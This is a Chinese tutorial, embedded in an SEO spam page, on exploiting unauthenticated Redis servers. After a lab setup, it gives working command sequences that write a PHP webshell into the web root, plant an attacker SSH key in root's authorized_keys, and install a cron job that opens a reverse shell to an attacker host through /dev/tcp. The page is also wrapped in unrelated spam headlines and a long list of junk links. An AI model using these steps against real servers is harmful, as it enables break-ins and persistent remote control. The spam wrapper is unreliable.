当前位置: 首页 > news >正文

网站的系统建设方式有哪些内容足球联赛排名

网站的系统建设方式有哪些内容,足球联赛排名,九江哪家网站建设公司好,照片做3d网站Redis简介 Redis是C语言开发的一个开源高性能(key-value)键值对类型的内存NoSQL数据库,可以用作数据库、缓存、信息中间件(性能非常优秀,支持持久化到硬盘且高可用)。由于其自身特点,可以广泛应用在数据集群&#xff…

Redis简介

Redis是C语言开发的一个开源高性能(key-value)键值对类型的内存NoSQL数据库,可以用作数据库、缓存、信息中间件(性能非常优秀,支持持久化到硬盘且高可用)。由于其自身特点,可以广泛应用在数据集群,分布式队列,信息中间件等网络架构中,在内网渗透的突破中,常常扮演getshell的角色。

关于redis未授权访问漏洞

Redis安装后,默认情况下会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等等,会导致 Redis 服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件的 authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器。

Redis在3.2.0之后增加了一个保护模式,默认还是无密码,但是限制了只有本地(回环接口)才能访问,但是由于无密码校验还是经常被利用,如ssrf,权限提升等等。

漏洞的产生条件有以下两点:

  1. Redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。

  2. 没有设置密码认证(默认为空)或者弱密码,可以登录redis服务。

漏洞影响版本

Redis 2.x,3.x,4.x,5.x

Redis环境搭建

这里是在ubuntu上搭建的

下载Redis源码:

wget http://download.redis.io/releases/redis-3.2.11.tar.gz

解压压缩包:

tar xzf redis-3.2.11.tar.gz

进入安装目录,编译执行:

cd redis-3.2.11
make

在这里插入图片描述
出现这个就代表编译成功了,如果编译出现问题可以看看 gcc 环境是否安装。

拷贝 ​​redis-server​​ 和​​ redis-cli​​ 拷贝到​​/usr/bin​​目录

cd src
cp redis-server /usr/bin/
cp redis-cli /usr/bin/

将​​redis.conf​​拷贝到​​/etc/​​目录下

cp redis.conf /etc/

编辑​​/etc/redis.conf​​文件,

vim /etc/redis.conf

在该行前面增加​​#​​,注释ip绑定,允许除本地外的主机远程登录redis服务
在这里插入图片描述
关闭保护模式,将​​yes​​改为​​no​​,允许远程连接redis服务
在这里插入图片描述
使用修改过后的配置文件启动​​Redis​​服务

redis-server /etc/redis.conf

在这里插入图片描述
接着使用另一台机器无账号登录redis:
在这里插入图片描述

写入webshell

利用条件:

  1. 目标开启了web服务,并且知道web路径。
  2. root权限执行的redis,具有读写权限。

假设已知 web 路径,代码如下:

config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo();?>"
save

去靶机看一下,可以看到已经写入了。
在这里插入图片描述
注意:
在写入webshell的时候,可以使用:​​\r\n​​来换行,因为保存下来的文件是数据库备份为快照文件所以存在一定格式(脏数据)可能导致无法解析。

set shell "\r\n\r\n<?php phpinfo();?>\r\n\r\n"

写入SSH 免密登录

原理:在数据库中插入一条数据,将本机的公钥作为value或key值,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生一个授权的key。

这个场景主要应用在没有 web 应用的服务器,redis一般都是与web分离的,linux系统都存在/root目录,所以这种方式会更加实用些。

  1. 在攻击机中生成ssh公钥和私钥,密码设置为空:
ssh-keygen -t rsa 

在这里插入图片描述
默认在/root/.ssh/目录生成2个文件,私钥:id_rsa 公钥:id_rsa.pub

  1. 进入​​/root/.ssh​​目录,将生成的公钥另存为 ​​pub_key.txt​:
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>pub_key.txt

为了保证写入的authorized_key能被解析,需要引入换行符(ubuntu亲测,不然会失败)

  1. 将保存的pub_key.txt文件内容写入redis
cat /root/.ssh/pub_key.txt | redis-cli -h 192.168.50.131 -x set pub

在这里插入图片描述
4. 设置redis的备份路径为:​​/root/.ssh/​​

在设置 redis 的备份路径的时候出现上图错误,原因是如果root用户没有使用过ssh服务是没有​​/root/.ssh/目录的,需要生成公、私钥或者建立ssh连接时才会生成。

  1. 设置上传公钥的备份文件名为:​​authorized_keys​
CONFIG SET dbfilename authorized_keys

在这里插入图片描述
保存,至此成功写入ssh公钥到靶机。测试ssh免密登录
在这里插入图片描述
成功登入。

写入计划任务反弹shell

这个比较蛮鸡肋,因为在debian、ubuntu等环境中对计划任务的格式解析非常严格,是没办法执行成功。但是在 centos 环境下默认 root 是可以通过这个方法拿到反弹shell的。

定时任务文件

  • linux通用:/etc/crontab

  • ubuntu:/var/spool/cron/crontabs/当前用户

  • centos:/var/spool/cron/当前用户

ubuntu无法利用的原因:

  • /etc/crontab,脏数据解析失败
  • /var/spool/cron/crontabs/root,redis默认写入644非600,提示失败
set 1 "\n* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

注:写入 /etc/crontab 需要多加个 root 才能执行,其它都一样

set 1 "\n* * * * * root bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\n"

ubuntu 实测发现可以写入,但是执行不了。

http://www.bjxfkj.com.cn/article/107474.html

相关文章:

  • 小榄网站建设职业培训网络平台
  • 常州网站制作哪家好软文大全500篇
  • 北京新闻网站护肤品推广软文
  • 做优化网站建设营销网站建设方案
  • 网站外链建设培训信息流广告
  • 泰州网站建设tzbdtg哈尔滨新闻头条今日新闻
  • 哪个网站能帮助做试卷济南新闻头条最新事件
  • 做网站注册几类商标阻断艾滋病的药有哪些
  • 网站域名如何起经典软文案例或软文案例
  • 什么网站做效果图最多扬州seo博客
  • 宁波做网站的大公司排名怎么建立网站?
  • 南昌网站seo费用网站seo专员
  • 专门做网站的软件百度推广费用多少钱
  • 长沙专业做网站的公司友情链接网站大全
  • 海南网站制作网络营销代运营外包公司
  • 网页设计比较优秀的网站数据交换平台
  • 黑客网站网址入口镇江百度关键词优化
  • 英孚做网络作业的网站网推接单平台有哪些
  • 用帝国做网站怎么样长尾关键词什么意思
  • 网站建设销售问你告诉我怎么制作厦门seo顾问屈兴东
  • 做网站价格和配置什么广告推广最有效果
  • 一块钱涨1000粉网站抖音seo软件工具
  • 做网站的教科书如何点击优化神马关键词排名
  • 给别人做网站收8000贵不贵微信管理工具
  • 怎么做建设网站网络广告人社区官网
  • 网站运营与数据分析推销广告
  • 大网站建设海口网站排名提升
  • 汇算清缴在哪个网站上做百度搜索app免费下载
  • 南宁公司建站模板怎么让网站排名上去
  • icp网站建设哪家网络推广好